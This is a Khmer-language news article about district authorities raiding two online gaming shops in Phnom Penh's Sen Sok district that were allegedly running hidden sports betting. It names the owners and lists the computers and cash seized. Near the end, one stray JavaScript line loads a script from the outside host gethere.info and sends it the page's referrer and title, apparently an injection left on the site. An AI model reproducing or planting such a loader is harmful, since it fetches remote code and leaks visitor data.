បង្ក្រាបទីតាំងហ្គេមអនឡាញពីរកន្លែងនៅសង្កាត់ភ្នំពេញថ្មី ប៉ះសុទ្ធ តែបង្កប់ live បាល់ និងប្រណាំងសេះ ពីកាសុីណូ

ភ្នំពេញ៖ បញ្ហាភូមិ-ឃុំមានសុវត្ថិភាពជាកត្តាសំខាន់ បន្ទាប់ពីរដ្ឋាភិបាលបានដាក់បញ្ចូលឱ្យប្រើប្រាស់ផ្លូវការជាមួយគ្នានោះក្នុងចំណោគោលនយោបាយទាំង៩ចំណុចគឺបទល្មើសល្បែងសីុសងហ្គេមអនឡាញជាកត្តាសំខាន់ដែលប្រជាពលរដ្ឋចាប់អារម្មណ៍ជាងគេចាប់អារម្មណ៍ក៍ព្រោះតែល្បែងសុីសងអាចធ្វើឱ្យមនុស្សឈ្លក់វង្វេងភ្លេចការងារភ្លេចបាយភ្លេចទឹកភ្លេចការសិក្សារនិងកែប្រែពីការចាញ់ល្បែងទៅជាបទល្មើស លួច ឆក់ ប្លន់ជាដើម ។

ជាក់ស្តែងកាលម៉ោង០៨និង៣០នាទីរព្រឹកថ្ងៃទី០៤សីហា២០១៦អាជ្ញាធរខណ្ឌបានចុះបង្ក្រាបហ្គេមអនឡាញចំនួន២ទីតាំងដែលបង្កប់ផ្នាល់បាល់ខាងក្នុងនិងធ្វើការដកហូតសម្ភារះនិងលុយមួយចំនួនធំ។
ទីតាំងហ្គេមអនឡាញនេះស្ថិតនៅផ្ទះលេខ២៣ផ្លូវ១០១៩ភូមិរោងចក្រនិងផ្ទះលេខសេ៣ផ្លូវ១៩៨៦ភូមិភ្នំពេញថ្មីសង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខ។

ក្នុងប្រតិបត្តិការខាងលើនេះដឹកនាំដោយលោកសាំង សុភៈវិចិត្រ អភិបាលរងខណ្ឌតំណាងលោកអភិបាលខណ្ឌសែនសុខលោកញឹម ភារុណមន្ត្រីសាលាខណ្ឌលោកប៑ិន ចន្ថា ប្រធានសណ្តាប់ធ្នាប់ខណ្ឌ លោកឃិន វិរះ ប្រធានសណ្តាប់ធ្នាប់សង្កាត់ភ្នំពេញថ្មី។

ម្ចាស់ទីតាំងទី១ឈ្មោះអ៑ុំ សីហា ភេទប្រុសអាយុ២៣ឆ្នាំមុខរបរបើកទីតាំងហ្គេមនិងស្នាក់នៅផ្ទះលេខ២៣ផ្លូវ១០១៩ភូមិរិងចក្រសង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខដកហូតសម្ភារះហ្គេមកុងព្យូទ័រ១២ សីុវីយូ១០ម៉ាសីុនព្រីនធ័រចំនួន០១និងលុយដុល្លា២៥៧$លុយខ្មែរ៤២០៦០០រៀល។

ម្ចាស់ទីតាំងទី១ឈ្មោះងន ច័ន្ទសេរីរ័ត្ន ភេទប្រុសអាយុ២៥ឆ្នាំមុខរបរ បើកទីតាំងហ្គេមស្នាក់នៅផ្ទះ លេខសេ៣ផ្លូវ១៩៨៦ភូមិភ្នំពេញថ្មីសង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខដកហូតសម្ភារះហ្គេមកុងព្យូទ័រចំនួន១៦ឈុត លុយដុល្លា៥១៣$លុយខ្មែរចំនួន២២៣១៥០០រៀល ។

ពលរដ្ឋក្នុងមូលដ្ឋានពិតជាមានការសាទរចំពោះចំណាត់ការរបស់លោកអភិបាលខណ្ឌសែនសុខទៅលើទីតាំងហ្គេមអនឡាញខាងលើនេះនិងសំណូមអោយលោកមេត្តាជួយបោសសំអាតទីតាំងហ្គេមអនឡាញអោយអស់ផងក្នុងខណ្ឌសែនសុខនេះពីព្រោះនៅមានច្រើនកន្លែងទៀត។

បច្ចប្បន្នសម្ភារះហ្គេមអនឡាញខាងលើត្រូវបានដកហូតយកទៅរក្សាទុកនៅសាលាខណ្ឌសែនសុខ។

image

image image image image image image image image image image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More